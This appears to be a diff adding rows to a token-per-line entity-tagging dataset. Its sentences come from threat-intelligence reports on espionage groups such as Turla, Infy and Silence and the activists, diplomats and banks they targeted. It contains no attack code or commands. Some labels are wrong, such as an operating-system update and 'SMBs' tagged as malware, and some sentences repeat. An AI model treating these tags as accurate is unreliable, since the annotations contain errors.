+defense S-IDTY
+, O
+oil S-IDTY
+, O
+and O
+financial B-IDTY
+services I-IDTY
+organizations E-IDTY
+based O
+in O
+or O
+affiliated O
+with O
+the O
+MENA S-LOC
+region O
+, O
+identifying O
+individual B-IDTY
+victims E-IDTY
+through O
+social B-IDTY
+media E-IDTY
+sites O
+. O
+
+The O
+Magic O
+Hound O
+has O
+repeatedly O
+used O
+social B-IDTY
+media E-IDTY
+to O
+identify O
+and O
+interact O
+with O
+employees S-IDTY
+at O
+targeted O
+organizations O
+and O
+then O
+used O
+weaponized O
+Excel B-ACT
+documents E-ACT
+. O
+
+The O
+May B-TIME
+2014 E-TIME
+' O
+Operation B-ACT
+Saffron I-ACT
+Rose E-ACT
+' O
+publication O
+identifies O
+an O
+Iranian S-LOC
+hacking O
+group O
+formerly O
+named O
+' O
+Ajax B-APT
+Security E-APT
+' O
+( O
+code-named O
+' O
+Flying B-APT
+Kitten E-APT
+' O
+by O
+CrowdStrike S-SECTEAM
+) O
+engaged O
+in O
+active O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+on O
+Iranian S-LOC
+dissidents S-IDTY
+( O
+those O
+attempting O
+to O
+circumvent O
+government O
+traffic O
+monitoring O
+) O
+. O
+
+An O
+Iranian S-LOC
+hacking O
+group O
+formerly O
+named O
+Ajax B-APT
+Security E-APT
+( O
+code-named O
+' O
+Flying B-APT
+Kitten E-APT
+' O
+by O
+CrowdStrike S-SECTEAM
+) O
+engaged O
+in O
+active O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+on O
+Iranian S-LOC
+dissidents S-IDTY
+( O
+those O
+attempting O
+to O
+circumvent O
+government O
+traffic O
+monitoring O
+) O
+. O
+
+PIVY S-MAL
+also O
+played O
+a O
+key O
+role O
+in O
+the O
+2011 B-ACT
+campaign E-ACT
+known O
+as O
+Nitro O
+that O
+targeted O
+chemical B-IDTY
+makers E-IDTY
+, O
+government B-IDTY
+agencies E-IDTY
+, O
+defense B-IDTY
+contractors E-IDTY
+, O
+and O
+human O
+rights O
+groups.10,11 O
+Still O
+active O
+a O
+year O
+later O
+, O
+the O
+Nitro O
+attackers S-APT
+used O
+a O
+zero-day S-VULNAME
+vulnerability O
+in O
+Java O
+to O
+deploy O
+PIVY S-MAL
+in O
+2012 S-TIME
+. O
+
+APT10 S-APT
+is O
+known O
+to O
+have O
+exfiltrated O
+a O
+high O
+volume O
+of O
+data O
+from O
+multiple O
+victims O
+, O
+exploiting O
+compromised O
+MSP B-MAL
+networks E-MAL
+, O
+and O
+those O
+of O
+their O
+customers S-IDTY
+, O
+to O
+stealthily O
+move O
+this O
+data O
+around O
+the O
+world O
+. O
+
+Targeted O
+sectors O
+of O
+Molerats S-APT
+include O
+governmental S-IDTY
+and O
+diplomatic I-IDTY
+institutions E-IDTY
+, O
+including O
+embassies S-IDTY
+; O
+companies O
+from O
+the O
+aerospace S-IDTY
+and O
+defence B-IDTY
+Industries E-IDTY
+; O
+financial B-IDTY
+institutions E-IDTY
+; O
+journalists S-IDTY
+; O
+software B-IDTY
+developers E-IDTY
+. O
+
+It O
+was O
+during O
+operator O
+X O
+'s O
+network O
+monitoring O
+that O
+the O
+attackers S-APT
+placed O
+Naikon B-MAL
+proxies E-MAL
+within O
+the O
+countries O
+' O
+borders O
+, O
+to O
+cloak O
+and O
+support O
+real-time O
+outbound O
+connections O
+and O
+data O
+Exfiltration S-ACT
+from O
+high-profile O
+victim O
+organizations E-IDTY
+. O
+
+In O
+early B-TIME
+May I-TIME
+2016 E-TIME
+, O
+both O
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+started O
+conducting O
+attack B-ACT
+campaigns E-ACT
+against O
+specific B-IDTY
+individuals E-IDTY
+in O
+Europe S-LOC
+. O
+
+Although O
+most O
+malware O
+today O
+either O
+seeks O
+monetary O
+gain O
+or O
+conducts O
+espionage S-ACT
+for O
+economic S-IDTY
+advantage O
+, O
+both O
+of O
+these O
+activity B-APT
+groups E-APT
+appear O
+to O
+seek O
+information O
+about O
+specific B-IDTY
+individuals E-IDTY
+. O
+
+Attackers S-APT
+using O
+several O
+locations O
+in O
+China S-LOC
+have O
+leveraged O
+C&C S-TOOL
+servers O
+on O
+purchased O
+hosted O
+services O
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+compromised O
+servers O
+in O
+the O
+Netherlands S-LOC
+to O
+wage O
+attacks O
+against O
+global O
+oil S-IDTY
+, O
+gas S-IDTY
+, O
+and O
+petrochemical B-IDTY
+companies E-IDTY
+, O
+as O
+well O
+as O
+individuals O
+and O
+executives S-IDTY
+in O
+Kazakhstan S-LOC
+, O
+Taiwan S-LOC
+, O
+Greece S-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+to O
+acquire O
+proprietary O
+and O
+highly O
+confidential O
+information O
+. O
+
+Attackers S-APT
+using O
+several O
+locations O
+in O
+China S-LOC
+have O
+leveraged O
+C&C S-TOOL
+servers O
+on O
+purchased O
+hosted O
+services O
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+compromised O
+servers O
+in O
+the O
+Netherlands S-LOC
+to O
+wage O
+attacks O
+against O
+global O
+oil S-IDTY
+, O
+gas S-IDTY
+, O
+and O
+petrochemical B-IDTY
+companies E-IDTY
+, O
+as O
+well O
+as O
+individuals O
+and O
+executives S-IDTY
+in O
+Kazakhstan S-LOC
+, O
+Taiwan S-LOC
+, O
+Greece S-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+to O
+acquire O
+proprietary O
+and O
+highly O
+confidential O
+information O
+. O
+
+Additionally O
+, O
+HELIX B-APT
+KITTEN I-APT
+actors E-APT
+have O
+shown O
+an O
+affinity O
+for O
+creating O
+thoroughly O
+researched O
+and O
+structured O
+spear-phishing S-ACT
+messages O
+relevant O
+to O
+the O
+interests O
+of O
+targeted O
+personnel S-IDTY
+. O
+
+The O
+attackers S-APT
+sent O
+multiple O
+emails S-TOOL
+containing O
+macro-enabled O
+XLS B-FILE
+files E-FILE
+to O
+employees B-IDTY
+working I-IDTY
+in I-IDTY
+the I-IDTY
+banking I-IDTY
+sector E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+In O
+late O
+2015 S-TIME
+, O
+Symantec S-SECTEAM
+identified O
+suspicious O
+activity O
+involving O
+a O
+hacking O
+tool O
+used O
+in O
+a O
+malicious O
+manner O
+against O
+one O
+of O
+our O
+customers S-IDTY
+. O
+
+The O
+SWC S-ACT
+of O
+a O
+Uyghur O
+cultural O
+website O
+suggests O
+intent O
+to O
+target O
+the O
+Uyghur B-IDTY
+ethnic I-IDTY
+group E-IDTY
+, O
+a O
+Muslim B-IDTY
+minority I-IDTY
+group E-IDTY
+primarily O
+found O
+in O
+the O
+Xinjiang S-LOC
+region O
+of O
+China O
+. O
+
+It's O
+possible O
+TG-3390 S-APT
+used O
+a O
+waterhole S-ACT
+to O
+infect O
+data B-IDTY
+center I-IDTY
+employees E-IDTY
+. O
+
+The O
+initial O
+attack O
+vector O
+used O
+in O
+the O
+attack O
+against O
+the O
+data O
+center O
+is O
+unclear O
+, O
+but O
+researchers O
+believe O
+LuckyMouse S-APT
+possibly O
+had O
+conducted O
+watering B-ACT
+hole E-ACT
+or O
+phishing B-ACT
+attacks E-ACT
+to O
+compromise O
+accounts O
+belonging O
+to O
+employees S-IDTY
+at O
+the O
+national O
+data O
+center O
+. O
+
+The O
+group O
+, O
+believed O
+to O
+be O
+based O
+in O
+China S-LOC
+, O
+has O
+also O
+targeted O
+defense B-IDTY
+contractors E-IDTY
+, O
+colleges S-IDTY
+and O
+universities S-IDTY
+, O
+law B-IDTY
+firms E-IDTY
+, O
+and O
+political B-IDTY
+organizations E-IDTY
+— O
+including O
+organizations O
+related O
+to O
+Chinese O
+minority B-IDTY
+ethnic I-IDTY
+groups E-IDTY
+. O
+
+In O
+all O
+cases O
+, O
+based O
+on O
+the O
+nature O
+of O
+the O
+computers O
+infected O
+by O
+Thrip O
+, O
+it O
+appeared O
+that O
+the O
+telecoms B-IDTY
+companies E-IDTY
+themselves O
+and O
+not O
+their O
+customers S-IDTY
+were O
+the O
+targets O
+of O
+these O
+attacks O
+. O
+
+Turla S-APT
+is O
+a O
+notorious O
+group O
+that O
+has O
+been O
+targeting O
+government B-IDTY
+officials E-IDTY
+. O
+
+Turla S-APT
+is O
+a O
+notorious O
+group O
+that O
+has O
+been O
+targeting O
+diplomats S-IDTY
+. O
+
+The O
+attackers O
+behind O
+Epic B-MAL
+Turla E-MAL
+have O
+infected O
+several O
+hundred O
+computers O
+in O
+more O
+than O
+45 O
+countries O
+, O
+including O
+embassies S-IDTY
+. O
+
+From O
+February S-TIME
+to O
+September B-TIME
+2016 E-TIME
+, O
+WhiteBear B-ACT
+activity E-ACT
+was O
+narrowly O
+focused O
+on O
+embassies S-IDTY
+and O
+consular O
+operations O
+around O
+the O
+world O
+. O
+
+All O
+of O
+these O
+early O
+WhiteBear S-MAL
+targets O
+were O
+related O
+to O
+embassies S-IDTY
+and O
+diplomatic/foreign O
+affair O
+organizations O
+. O
+
+Thus O
+, O
+Turla S-APT
+operators O
+had O
+access O
+to O
+some O
+highly O
+sensitive O
+information O
+( O
+such O
+as O
+emails S-TOOL
+sent O
+by O
+the O
+German B-IDTY
+Foreign I-IDTY
+Office I-IDTY
+staff E-IDTY
+) O
+for O
+almost O
+a O
+year O
+. O
+
+We O
+suspect O
+the O
+Kazuar B-MAL
+tool E-MAL
+may O
+be O
+linked O
+to O
+the O
+Turla S-APT
+threat O
+actor O
+group O
+( O
+also O
+known O
+as O
+Uroburos S-APT
+and O
+Snake S-APT
+) O
+, O
+who O
+have O
+been O
+reported O
+to O
+have O
+compromised O
+embassies S-IDTY
+, O
+defense B-IDTY
+contractors E-IDTY
+, O
+educational B-IDTY
+institutions E-IDTY
+, O
+and O
+research B-IDTY
+organizations E-IDTY
+across O
+the O
+globe O
+. O
+
+Deepen S-SECTEAM
+told O
+Threatpost O
+the O
+group O
+has O
+been O
+operating O
+since O
+at O
+least O
+since O
+2008 S-TIME
+and O
+has O
+targeted O
+China B-IDTY
+and I-IDTY
+US I-IDTY
+relations I-IDTY
+experts E-IDTY
+, O
+Defense B-SECTEAM
+Department E-SECTEAM
+entities O
+, O
+and O
+geospatial B-IDTY
+groups E-IDTY
+within O
+the O
+federal B-IDTY
+government E-IDTY
+. O
+
+Government B-IDTY
+officials E-IDTY
+said O
+they O
+knew O
+the O
+initial O
+attack O
+occurred O
+in O
+2011 S-TIME
+, O
+but O
+are O
+unaware O
+of O
+who O
+specifically O
+is O
+behind O
+the O
+attacks O
+. O
+
+Bahamut O
+was O
+first O
+noticed O
+when O
+it O
+targeted O
+a O
+Middle B-IDTY
+Eastern I-IDTY
+human I-IDTY
+rights I-IDTY
+activist E-IDTY
+in O
+the O
+first O
+week O
+of O
+January B-TIME
+2017 E-TIME
+. O
+
+Later O
+that O
+month O
+, O
+the O
+same O
+tactics O
+and O
+patterns O
+were O
+seen O
+in O
+attempts O
+against O
+an O
+Iranian B-IDTY
+women I-IDTY
+'s I-IDTY
+activist E-IDTY
+– O
+an O
+individual S-IDTY
+commonly O
+targeted O
+by O
+Iranian B-LOC
+actors E-LOC
+, O
+such O
+as O
+Charming O
+Kitten O
+and O
+the O
+Sima B-ACT
+campaign E-ACT
+documented O
+in O
+our O
+2016 S-TIME
+Black O
+Hat O
+talk O
+. O
+
+Several O
+times O
+, O
+APT5 S-APT
+has O
+targeted O
+organizations S-IDTY
+and O
+personnel S-IDTY
+based O
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+Given O
+our O
+increased O
+confidence O
+that O
+Bahamut O
+was O
+responsible O
+for O
+targeting O
+of O
+Qatari S-LOC
+labor B-IDTY
+rights I-IDTY
+advocates E-IDTY
+and O
+its O
+focus O
+on O
+the O
+foreign B-IDTY
+policy I-IDTY
+institutions E-IDTY
+other O
+Gulf O
+states O
+, O
+Bahamut O
+'s O
+interests O
+are O
+seemingly O
+too O
+expansive O
+to O
+be O
+limited O
+one O
+sponsor O
+or O
+customer O
+. O
+
+Barium S-APT
+specializes O
+in O
+targeting O
+high O
+value O
+organizations O
+holding O
+sensitive O
+data O
+, O
+by O
+gathering O
+extensive O
+information O
+about O
+their O
+employees S-IDTY
+through O
+publicly O
+available O
+information O
+and O
+social B-IDTY
+media E-IDTY
+, O
+using O
+that O
+information O
+to O
+fashion O
+phishing B-ACT
+attacks E-ACT
+intended O
+to O
+trickthose O
+employees S-IDTY
+into O
+compromising O
+their O
+computers O
+and O
+networks O
+. O
+
+Barium S-APT
+has O
+targeted O
+Microsoft B-IDTY
+customers E-IDTY
+both O
+in O
+Virginia O
+, O
+the O
+United O
+States O
+, O
+and O
+around O
+the O
+world O
+. O
+
+BLACKGEAR S-ACT
+is O
+an O
+espionage B-ACT
+campaign E-ACT
+which O
+has O
+targeted O
+users S-IDTY
+in O
+Taiwan S-LOC
+for O
+many O
+years O
+. O
+
+Our O
+research O
+indicates O
+that O
+it O
+has O
+started O
+targeting O
+Japanese B-IDTY
+users E-IDTY
+. O
+
+Our O
+experts O
+have O
+found O
+that O
+cybercriminals O
+are O
+actively O
+focusing O
+on O
+SMBs S-MAL
+, O
+and O
+giving O
+particular O
+attention O
+to O
+accountants S-IDTY
+. O
+
+Clever B-APT
+Kitten E-APT
+actors O
+have O
+a O
+strong O
+affinity O
+for O
+PHP O
+server-side O
+attacks O
+to O
+make O
+access O
+; O
+this O
+is O
+relatively O
+unique O
+amongst O
+targeted O
+attackers O
+who O
+often O
+favor O
+targeting O
+a O
+specific O
+individual S-IDTY
+at O
+a O
+specific O
+organization O
+using O
+social B-IDTY
+engineering E-IDTY
+. O
+
+Some O
+of O
+the O
+exploit S-VULNAME
+server O
+paths O
+contain O
+modules O
+that O
+appear O
+to O
+have O
+been O
+designed O
+to O
+infect O
+Linux S-OS
+computers O
+, O
+but O
+we O
+have O
+not O
+yet O
+located O
+the O
+Linux S-OS
+backdoor O
+. O
+
+Confucius O
+targeted O
+a O
+particular O
+set O
+of O
+individuals O
+in O
+South O
+Asian O
+countries O
+, O
+such O
+as O
+military B-IDTY
+personnel E-IDTY
+and O
+businessmen S-IDTY
+, O
+among O
+others O
+. O
+
+According O
+to O
+statistics O
+, O
+Corkow S-MAL
+primarily O
+targets O
+users S-IDTY
+in O
+Russia O
+and O
+the O
+CIS O
+, O
+but O
+it O
+is O
+worth O
+noting O
+that O
+in O
+2014 S-TIME
+the O
+amount O
+of O
+attacks O
+targeting O
+the O
+USA O
+increased O
+by O
+5 O
+times O
+, O
+in O
+comparison O
+with O
+2011 S-TIME
+. O
+
+The O
+threat O
+is O
+likely O
+targeting O
+employees S-IDTY
+of O
+various O
+Palestinian S-LOC
+government B-IDTY
+agencies E-IDTY
+, O
+security B-IDTY
+services E-IDTY
+, O
+Palestinian O
+students S-IDTY
+, O
+and O
+those O
+affiliated O
+with O
+the O
+Fatah B-IDTY
+political I-IDTY
+party E-IDTY
+. O
+
+For O
+example O
+, O
+the O
+actors O
+behind O
+FrozenCell S-MAL
+used O
+a O
+spoofed O
+app O
+called O
+Tawjihi B-MAL
+2016 E-MAL
+, O
+which O
+Jordanian S-LOC
+or O
+Palestinian S-LOC
+students S-IDTY
+would O
+ordinarily O
+use O
+during O
+their O
+general O
+secondary O
+examination O
+. O
+
+The O
+titles O
+and O
+contents O
+of O
+these O
+files O
+suggest O
+that O
+the O
+actor O
+targeted O
+individuals O
+affiliated O
+with O
+these O
+government B-IDTY
+agencies E-IDTY
+and O
+the O
+Fatah B-IDTY
+political I-IDTY
+party E-IDTY
+. O
+
+Political B-IDTY
+entities E-IDTY
+in O
+Central O
+Asia O
+have O
+been O
+targeted O
+throughout O
+2018 S-TIME
+by O
+different O
+actors O
+, O
+including O
+IndigoZebra S-APT
+, O
+Sofacy S-APT
+( O
+with O
+Zebrocy S-MAL
+malware S-MAL
+) O
+and O
+most O
+recently O
+by O
+DustSquad O
+( O
+with O
+Octopus S-MAL
+malware S-MAL
+) O
+. O
+
+Targets O
+included O
+a O
+wide O
+array O
+of O
+high-profile O
+entities O
+, O
+including O
+intelligence B-IDTY
+services E-IDTY
+, O
+military S-IDTY
+, O
+utility B-IDTY
+providers E-IDTY
+( O
+telecommunications S-IDTY
+and O
+power S-IDTY
+) O
+, O
+embassies S-IDTY
+, O
+and O
+government B-IDTY
+institutions E-IDTY
+. O
+
+The O
+computers O
+of O
+diplomats S-IDTY
+, O
+military B-IDTY
+attachés E-IDTY
+, O
+private B-IDTY
+assistants E-IDTY
+, O
+secretaries S-IDTY
+to O
+Prime B-IDTY
+Ministers E-IDTY
+, O
+journalists S-IDTY
+and O
+others O
+are O
+under O
+the O
+concealed O
+control O
+of O
+unknown O
+assailant O
+(s O
+) O
+. O
+
+The O
+banking O
+malware O
+GozNym S-MAL
+has O
+legs O
+; O
+only O
+a O
+few O
+weeks O
+after O
+the O
+hybrid O
+Trojan S-MAL
+was O
+discovered O
+, O
+it O
+has O
+reportedly O
+spread O
+into O
+Europe O
+and O
+begun O
+plaguing O
+banking B-IDTY
+customers E-IDTY
+in O
+Poland O
+with O
+redirection B-ACT
+attacks E-ACT
+. O
+
+We O
+noted O
+in O
+our O
+original O
+blog O
+the O
+large O
+amount O
+of O
+targeting O
+of O
+Iranian S-LOC
+citizens S-IDTY
+in O
+this O
+campaign O
+, O
+we O
+observed O
+almost O
+one-third O
+of O
+all O
+victims O
+to O
+be O
+Iranian O
+. O
+
+Since O
+early O
+2013 S-TIME
+, O
+we O
+have O
+observed O
+activity O
+from O
+a O
+unique O
+threat O
+actor O
+group O
+, O
+which O
+we O
+began O
+to O
+investigate O
+based O
+on O
+increased O
+activities S-ACT
+against O
+human O
+right O
+activists S-IDTY
+in O
+the O
+beginning O
+of O
+2015 S-TIME
+. O
+
+Over O
+the O
+course O
+of O
+three O
+years O
+of O
+observation O
+of O
+campaigns S-ACT
+targeting O
+civil B-IDTY
+society E-IDTY
+and O
+human B-IDTY
+rights I-IDTY
+organizations E-IDTY
+, O
+from O
+records O
+of O
+well O
+over O
+two O
+hundred O
+spearphishing S-ACT
+and O
+other O
+intrusion O
+attempts O
+against O
+individuals O
+inside O
+of O
+Iran S-LOC
+and O
+in O
+the O
+diaspora S-IDTY
+, O
+a O
+narrative O
+of O
+persistent O
+intrusion O
+efforts O
+emerges O
+. O
+
+Over O
+the O
+months O
+following O
+the O
+elections O
+, O
+the O
+accounts O
+of O
+Iranians S-IDTY
+that O
+had O
+been O
+compromised O
+by O
+the O
+actors O
+were O
+then O
+used O
+for O
+spreading O
+the O
+malware O
+. O
+
+The O
+Infy S-MAL
+malware S-MAL
+was O
+seen O
+targeting O
+Iranians S-IDTY
+again O
+in O
+June B-TIME
+2015 E-TIME
+, O
+when O
+it O
+was O
+shared O
+with O
+researchers O
+after O
+being O
+sent O
+to O
+a O
+broadcast B-IDTY
+journalist E-IDTY
+at O
+BBC B-IDTY
+Persian E-IDTY
+with O
+a O
+generic O
+introduction O
+and O
+a O
+PowerPoint S-TOOL
+presentation O
+attached O
+titled O
+" O
+Nostalogy O
+" O
+( O
+sic O
+) O
+. O
+
+One O
+narrowly-targeted O
+spearphishing S-ACT
+from O
+Infy O
+was O
+sent O
+from O
+the O
+compromised O
+account O
+of O
+a O
+political B-IDTY
+activist E-IDTY
+promoting O
+participation O
+inside O
+of O
+Iran S-LOC
+, O
+claiming O
+to O
+be O
+a O
+set O
+of O
+images O
+of O
+a O
+British-Iranian S-IDTY
+dual O
+national O
+that O
+has O
+been O
+held O
+in O
+Evin O
+Prison O
+for O
+five O
+years O
+on O
+espionage O
+charges O
+. O
+
+As O
+in O
+the O
+past O
+, O
+these O
+messages O
+have O
+been O
+sent O
+accounts O
+believed O
+to O
+be O
+fake O
+and O
+accounts O
+compromised O
+by O
+Infy O
+, O
+including O
+Kurdish B-IDTY
+activists E-IDTY
+that O
+had O
+previously O
+been O
+compromised O
+by O
+the O
+Flying B-APT
+Kitten I-APT
+actor I-APT
+group E-APT
+. O
+
+The O
+Windows B-MAL
+10 I-MAL
+Creators I-MAL
+Update E-MAL
+will O
+bring O
+several O
+enhancements O
+to O
+Windows B-SECTEAM
+Defender I-SECTEAM
+ATP E-SECTEAM
+that O
+will O
+provide O
+SOC B-IDTY
+personnel E-IDTY
+with O
+options O
+for O
+immediate O
+mitigation O
+of O
+a O
+detected O
+threat O
+. O
+
+LEAD O
+and O
+Barium S-APT
+are O
+not O
+known O
+for O
+large-scale O
+spear-phishing S-ACT
+, O
+so O
+it O
+is O
+unlikely O
+that O
+SOC B-IDTY
+personnel E-IDTY
+would O
+have O
+to O
+deal O
+with O
+multiple O
+machines O
+having O
+been O
+compromised O
+by O
+these O
+groups O
+at O
+the O
+same O
+time O
+. O
+
+While O
+the O
+machine O
+is O
+in O
+isolation O
+, O
+SOC B-IDTY
+personnel E-IDTY
+can O
+direct O
+the O
+infected O
+machine O
+to O
+collect O
+live O
+investigation O
+data O
+, O
+such O
+as O
+the O
+DNS S-PROT
+cache O
+or O
+security O
+event O
+logs O
+, O
+which O
+they O
+can O
+use O
+to O
+verify O
+alerts O
+, O
+assess O
+the O
+state O
+of O
+the O
+intrusion O
+, O
+and O
+support O
+follow-up O
+actions O
+. O
+
+The O
+samples O
+provided O
+were O
+alleged O
+to O
+be O
+targeting O
+Tibetan S-LOC
+and O
+Chinese B-LOC
+Pro-Democracy I-IDTY
+Activists E-IDTY
+. O
+
+They O
+are O
+often O
+targeted O
+simultaneously O
+with O
+other O
+ethnic B-IDTY
+minorities E-IDTY
+and O
+religious B-IDTY
+groups E-IDTY
+in O
+China S-LOC
+. O
+
+Examples O
+as O
+early O
+as O
+2008 S-TIME
+document B-FILE
+malware E-FILE
+operations O
+against O
+Tibetan B-IDTY
+non-governmental I-IDTY
+organizations E-IDTY
+( O
+NGOs S-IDTY
+) O
+that O
+also O
+targeted O
+Falun B-IDTY
+Gong E-IDTY
+and O
+Uyghur B-IDTY
+groups E-IDTY
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+recently O
+identified O
+a O
+targeted B-ACT
+attack E-ACT
+against O
+an O
+individual O
+working O
+for O
+the O
+Foreign B-IDTY
+Ministry E-IDTY
+of O
+Uzbekistan B-LOC
+in I-LOC
+China E-LOC
+. O
+
+NetTraveler S-MAL
+has O
+been O
+used O
+to O
+target O
+diplomats S-IDTY
+, O
+embassies S-IDTY
+and O
+government B-IDTY
+institutions E-IDTY
+for O
+over O
+a O
+decade O
+, O
+and O
+remains O
+the O
+tool O
+of O
+choice O
+by O
+the O
+adversaries O
+behind O
+these O
+cyber B-ACT
+espionage I-ACT
+campaigns E-ACT
+. O
+
+The O
+NetTraveler O
+group O
+has O
+infected O
+victims O
+across O
+multiple O
+establishments O
+in O
+both O
+the O
+public O
+and O
+private O
+sector O
+including O
+government B-IDTY
+institutions E-IDTY
+, O
+embassies S-IDTY
+, O
+the O
+oil B-IDTY
+and I-IDTY
+gas I-IDTY
+industry E-IDTY
+, O
+research O
+centers O
+, O
+military B-IDTY
+contractors E-IDTY
+and O
+activists S-IDTY
+. O
+
+The O
+main O
+point O
+that O
+sets O
+Operation B-ACT
+Groundbait E-ACT
+apart O
+from O
+the O
+other O
+attacks O
+is O
+that O
+it O
+has O
+mostly O
+been O
+targeting O
+anti-government B-IDTY
+separatists E-IDTY
+in O
+the O
+self-declared O
+Donetsk O
+and O
+Luhansk O
+People O
+'s O
+Republics O
+. O
+
+Although O
+Silence O
+'s O
+phishing B-ACT
+emails S-TOOL
+were O
+also O
+sent O
+to O
+bank B-IDTY
+employees E-IDTY
+in O
+Central B-LOC
+and I-LOC
+Western I-LOC
+Europe E-LOC
+, O
+Africa S-LOC
+, O
+and O
+Asia S-LOC
+) O
+. O
+
+They O
+tried O
+new O
+techniques O
+to O
+steal O
+from O
+banking O
+systems O
+, O
+including O
+AWS O
+CBR O
+( O
+the O
+Russian S-LOC
+Central B-IDTY
+Bank I-IDTY
+'s I-IDTY
+Automated I-IDTY
+Workstation I-IDTY
+Client E-IDTY
+) O
+, O
+ATMs S-IDTY
+, O
+and O
+card O
+processing O
+. O
+
+However O
+, O
+some O
+phishing B-ACT
+emails S-TOOL
+were O
+sent O
+to O
+bank B-IDTY
+employees E-IDTY
+in O
+more O
+than O
+25 O
+countries O
+of O
+Central S-LOC
+and O
+Western S-LOC
+Europe S-LOC
+, O
+Africa S-LOC
+and O
+Asia S-LOC
+including O
+: O
+Kyrgyzstan S-LOC
+, O
+Armenia S-LOC
+, O
+Georgia S-LOC
+, O
+Serbia S-LOC
+, O
+Germany S-LOC
+, O
+Latvia S-LOC
+, O
+Czech B-LOC
+Republic E-LOC
+, O
+Romania S-LOC
+, O
+Kenya S-LOC
+, O
+Israel S-LOC
+, O
+Cyprus S-LOC
+, O
+Greece S-LOC
+, O
+Turkey S-LOC
+, O
+Taiwan S-LOC
+, O
+Malaysia S-LOC
+, O
+Switzerland S-LOC
+, O
+Vietnam S-LOC
+, O
+Austria S-LOC
+, O
+Uzbekistan S-LOC
+, O
+Great B-LOC
+Britain E-LOC
+, O
+Hong B-LOC
+Kong E-LOC
+, O
+and O
+others O
+. O
+
+An O
+interesting O
+point O
+in O
+the O
+Silence B-ACT
+attack E-ACT
+is O
+that O
+the O
+cybercriminals O
+had O
+already O
+compromised O
+banking S-IDTY
+infrastructure O
+in O
+order O
+to O
+send O
+their O
+spear-phishing S-ACT
+emails S-TOOL
+from O
+the O
+addresses O
+of O
+real O
+bank B-IDTY
+employees E-IDTY
+and O
+look O
+as O
+unsuspicious O
+as O
+possible O
+to O
+future O
+victims O
+. O
+
+A O
+preliminary O
+analysis O
+caught O
+the O
+attention O
+of O
+our O
+Threat O
+Analysis O
+and O
+Intelligence O
+team O
+as O
+it O
+yielded O
+interesting O
+data O
+that O
+, O
+among O
+other O
+things O
+, O
+shows O
+that O
+Silence O
+was O
+targeting O
+employees S-IDTY
+from O
+financial B-IDTY
+entities E-IDTY
+, O
+specifically O
+in O
+the O
+Russian B-LOC
+Federation E-LOC
+and O
+the O
+Republic B-LOC
+of I-LOC
+Belarus E-LOC
+. O
+
+While O
+the O
+Sima O
+moniker O
+could O
+similarly O
+originate O
+from O
+software O
+labels O
+, O
+it O
+is O
+a O
+common O
+female O
+Persian O
+name O
+and O
+a O
+Persian-language O
+Word S-TOOL
+for O
+" O
+visage O
+" O
+or O
+" O
+appearance O
+" O
+. O
+Given O
+its O
+use O
+in O
+more O
+advanced O
+social B-IDTY
+engineering I-IDTY
+campaigns E-IDTY
+against O
+women B-IDTY
+'s I-IDTY
+rights I-IDTY
+activists E-IDTY
+, O
+the O
+label O
+seem O
+particularly O
+apt O
+. O
+
+Samples O
+and O
+resource O
+names O
+contained O
+the O
+family O
+names O
+of O
+prominent O
+Iranians S-IDTY
+, O
+and O
+several O
+of O
+these O
+individuals O
+received O
+the O
+malware O
+located O
+in O
+their O
+respective O
+folder O
+. O
+
+For O
+the O
+sake O
+of O
+narrative O
+we O
+are O
+going O
+to O
+focus O
+exclusively O
+to O
+those O
+samples O
+we O
+identified O
+being O
+used O
+in O
+attacks O
+against O
+Iranian S-LOC
+civil B-IDTY
+society E-IDTY
+and O
+diaspora S-IDTY
+. O
+
+After O
+reviewing O
+all O
+the O
+malware O
+functionalities O
+, O
+we O
+are O
+confident O
+in O
+saying O
+that O
+the O
+attackers S-APT
+look O
+for O
+victims B-IDTY
+who I-IDTY
+answer E-IDTY
+well-defined O
+characteristics O
+and O
+believe O
+that O
+further O
+stages O
+of O
+the O
+attack O
+are O
+delivered O
+only O
+to O
+those O
+who O
+fit O
+the O
+specific O
+victim O
+profile O
+. O
+
+It's O
+coincident O
+that O
+both O
+'darkhydrus' S-APT
+APT O
+group O
+name O
+and O
+‘Williams’ S-APT
+user O
+name O
+in O
+PDB O
+path O
+found O
+in O
+this O
+Twitter B-IDTY
+user E-IDTY
+. O
+
+The O
+360 O
+Intelligence O
+Center O
+observed O
+four O
+distinct O
+campaigns O
+against O
+Pakistan S-LOC
+since O
+2017 O
+(link) O
+, O
+recently O
+targeting O
+Pakistani B-IDTY
+businessmen E-IDTY
+working O
+in O
+China O
+. O
+
+In O
+the O
+latest O
+attack O
+, O
+Donot B-APT
+group E-APT
+is O
+targeting O
+Pakistani B-IDTY
+businessman E-IDTY
+working O
+in O
+China S-LOC
+
+A O
+previous O
+, O
+removed O
+, O
+report O
+from O
+another O
+vendor O
+claimed O
+non-specific O
+information O
+about O
+the O
+groups' S-APT
+interest O
+in O
+Chinese B-IDTY
+universities E-IDTY
+, O
+but O
+that O
+report O
+has O
+been O
+removed O
+– O
+most O
+likely O
+detections O
+were O
+related O
+to O
+students’ O
+and O
+researchers’ O
+scanning O
+known O
+collected O
+samples O
+and O
+any O
+incidents” O
+remain O
+unconfirmed O
+and O
+unknown O
+. O
+
+The O
+most O
+popular O
+targets O
+of O
+SneakyPastes S-APT
+are O
+embassies S-IDTY
+, O
+government B-IDTY
+entities E-IDTY
+, O
+education S-IDTY
+, O
+media B-IDTY
+outlets E-IDTY
+, O
+journalists O
+, O
+activists S-IDTY
+, O
+political O
+parties O
+or O
+personnel S-IDTY
+, O
+healthcare S-IDTY
+and O
+banking S-IDTY
+. O
+
+Through O
+our O
+continuous O
+monitoring O
+of O
+threats O
+during O
+2018 S-TIME
+, O
+we O
+observed O
+a O
+new O
+wave O
+of O
+attacks O
+by O
+Gaza B-APT
+Cybergang I-APT
+Group1 E-APT
+targeting O
+embassies S-IDTY
+and O
+political B-IDTY
+personnel E-IDTY
+. O
+
+This O
+could O
+include O
+diplomats S-IDTY
+, O
+experts O
+in O
+the O
+LOCs O
+of O
+interest O
+related O
+to O
+the O
+Digital O
+Economy O
+Task O
